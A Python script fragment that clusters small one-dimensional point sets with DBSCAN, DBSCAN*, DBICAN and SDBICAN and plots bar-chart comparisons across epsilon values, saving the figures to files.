points = np.array([1, 2, 2, 3, 3, 4, 4, 4, 5, 6, 6, 8, 11, 12,
12, 13, 13, 13, 14, 14, 14, 15, 15, 16, 18,
23, 25, 26, 27, 27, 28, 29, 30, 31, 33])
# variables
mpts = 10
eps = 5
# DBSCAN labels
cores, dbscan_labels = dbscan(points.reshape(-1, 1),
eps=eps,
min_samples=mpts)
# DBSCAN* labels are same for core points but otherwise -1
dbscanx_labels = np.zeros(len(points), dtype=np.int) - 1
dbscanx_labels[cores] = dbscan_labels[cores]
# DBICAN labels
dbican = DBICAN(min_points=mpts, epsilon=eps)
dbican.fit(points)
dbican_labels = dbican.labels()
# plotting
labels_list = [dbscan_labels, dbscanx_labels, dbican_labels]
name_list = [r'DBSCAN', r'DBSCAN*', 'DBICAN']
title = r'Comparison of Algorithms with $m_{pts}=10$ and $\varepsilon=5$'
legend_labels = ['.', '1', '2']
x_max_ofset = 2
height = 2.5
width = 6
n_row = 3
n_col = 1
rcParams['figure.figsize'] = width, height
x_max = np.max(points) + x_max_ofset
position = np.arange(x_max)
colour = np.zeros(position.shape, dtype='U2')
grey = '#C8C8C8'
colour[:] = grey
fig, ax = plt.subplots(n_row, n_col, sharex='col', sharey='row')
for row in range(n_row):
name = name_list[row]
labels = labels_list[row]
for l in [-1, 0, 1]:
if l is -1:
colour = grey
else:
colour = 'C{0}'.format(l)
counts = np.zeros(x_max, dtype=np.int)
counts_ = Counter(points[labels == l])
for i in range(len(position)):
if i in counts_:
counts[i] = counts_[i]
ax[row].bar(position,
counts,
width=1,
color=colour,
tick_label=position)
if row is 0:
ax[row].arrow(23, 2.5, dx=0, dy=-1,
length_includes_head=True,
head_width=0.5,
head_length=0.2)
if row is 0:
ax[row].set_title(title)
ax[row].get_xaxis().set_ticks([])
ax[row].get_yaxis().set_ticks([])
ax[row].set_ylabel(name)
plt.savefig(directory+'/DBICAN.png')
# figure 2: comparison of DBICAN and SDBICAN
# read tip positions
points = np.array([1, 2, 2, 3, 3, 4, 4, 4, 5, 6, 6, 8, 11, 12,
12, 13, 13, 13, 14, 14, 14, 15, 15, 16, 18])
# variables
mpts = 10
# plot
legend_labels = ['.', '1', '2']
x_max_ofset = 2
height = 5
width = 6
n_row = 10
n_col = 2
rcParams['figure.figsize'] = width, height
x_max = np.max(points) + x_max_ofset
position = np.arange(x_max)
colour = np.zeros(position.shape, dtype='U2')
grey = '#C8C8C8'
colour[:] = grey
fig, ax = plt.subplots(n_row, n_col, sharex='col', sharey='row')
for col in range(n_col):
for row in range(n_row):
mpts = 10
eps = row + 1
if col is 0:
model = DBICAN(mpts, eps)
elif col is 1:
model = SDBICAN(mpts, eps)
model.fit(points)
labels = model.labels()
for l in [-1, 0, 1]:
if l is -1:
colour = grey
else:
colour = 'C{0}'.format(l)
counts = np.zeros(x_max, dtype=np.int)
counts_ = Counter(points[labels == l])
for i in range(len(position)):
if i in counts_:
counts[i] = counts_[i]
ax[row, col].bar(position,
counts,
width=1,
color=colour,
tick_label=position)
ax[row, col].get_xaxis().set_ticks([])
ax[row, col].get_yaxis().set_ticks([])
if row is 0:
ax[row, col].set_title('SDBICAN' if col else 'DBICAN')
if col is 0:
ax[row, col].set_ylabel(r'$\varepsilon={0}$'.format(eps))
plt.savefig(directory+'/SDBICAN.png') | 0.397704 | 0.373647 |